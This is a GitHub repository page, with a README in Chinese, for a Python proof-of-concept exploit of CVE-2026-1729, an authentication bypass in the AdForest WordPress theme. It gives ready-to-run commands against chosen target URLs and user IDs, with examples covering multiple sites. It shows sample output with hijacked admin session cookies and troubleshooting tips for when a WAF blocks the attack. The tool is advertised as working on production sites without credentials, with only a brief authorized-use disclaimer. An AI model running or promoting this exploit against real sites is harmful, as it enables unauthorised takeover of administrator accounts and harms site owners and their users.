ninjazan420/CVE-2026-1729-PoC-AdForest-WordPress-Authentication-Bypass

GitHub: ninjazan420/CVE-2026-1729-PoC-AdForest-WordPress-Authentication-Bypass

针对 AdForest WordPress 主题认证绕过漏洞(CVE-2026-1729)的概念验证工具,利用 OTP 函数身份校验缺陷实现无需凭据获取管理员访问权限。

Stars: 1 | Forks: 0

# CVE-2026-1729 - AdForest WordPress 认证绕过 PoC ## 描述 CVE-2026-1729 的简单概念验证 (PoC) - AdForest WordPress 主题中的认证绕过漏洞。 作者:f3ds cr3w est 2oo2 [博客](https://f3ds.vercel.app/) ## 功能 - ✅ 无需凭据直接获取管理员访问权限 - ✅ 适用于生产环境的 WordPress 实例 - ✅ 无需 Docker 设置 - ✅ 简单的命令行界面 - ✅ 会话持久化 ## 系统要求 - Python 3.6+ - `requests` 库 ## 安装 ``` pip install requests ``` ## 用法 ### 基本用法 ``` python poc/exploit.py https://target-site.com ``` ### 指定目标用户 ID ``` python poc/exploit.py https://target-site.com --user-id 2 ``` ### 示例 ``` # 利用默认管理员 (user ID 1) python poc/exploit.py https://example.com # 利用特定用户账户 python poc/exploit.py https://example.com --user-id 5 # 测试多个目标 python poc/exploit.py https://site1.com python poc/exploit.py https://site2.com --user-id 3 ``` ## 输出 ``` CVE-2026-1729 - AdForest WordPress Authentication Bypass ======================================================= WARNING: For authorized testing only! ======================================================= [+] Target: https://example.com [+] Targeting user ID: 1 [+] Sending exploit to: https://example.com/wp-admin/admin-ajax.php [+] SUCCESS! Admin access granted [+] Admin URL: https://example.com/wp-admin/ [+] Session cookies: {'wp-settings-time-1': '1234567890', 'wordpress_logged_in_...': '...'} [+] Logged in as: admin 🎯 Exploit completed successfully! You now have admin access to the WordPress site. ``` ## 漏洞利用后发生的情况 1. **管理员访问权限**:您将获得对 `/wp-admin/` 的完全管理员访问权限 2. **会话持久化**:该漏洞利用程序会维护会话 cookies 3. **用户信息**:显示您已攻陷的账户信息 4. **直接访问**:您可以立即访问 WordPress 管理仪表板 ## 注意事项 - **合法使用**:仅限于您拥有或获得明确测试授权的网站 - **目标要求**:站点必须安装了 AdForest 主题 - **成功率**:适用于 AdForest 主题的易受攻击版本 - **无需安装**:无需在目标服务器上安装任何东西 ## 故障排除 如果漏洞利用失败: 1. 验证是否安装了 AdForest 主题 2. 检查站点是否运行 WordPress 3. 确保主题版本存在漏洞 4. 确认没有 WAF 或安全插件阻止请求
标签:AdForest主题, Admin Takeover, Auth Bypass, CISA项目, CVE-2026-1729, Maven, OTP绕过, Python PoC, Web安全, WordPress漏洞, 协议分析, 威胁模拟, 未授权访问, 权限提升, 漏洞验证, 网络安全, 蓝队分析, 身份验证绕过, 隐私保护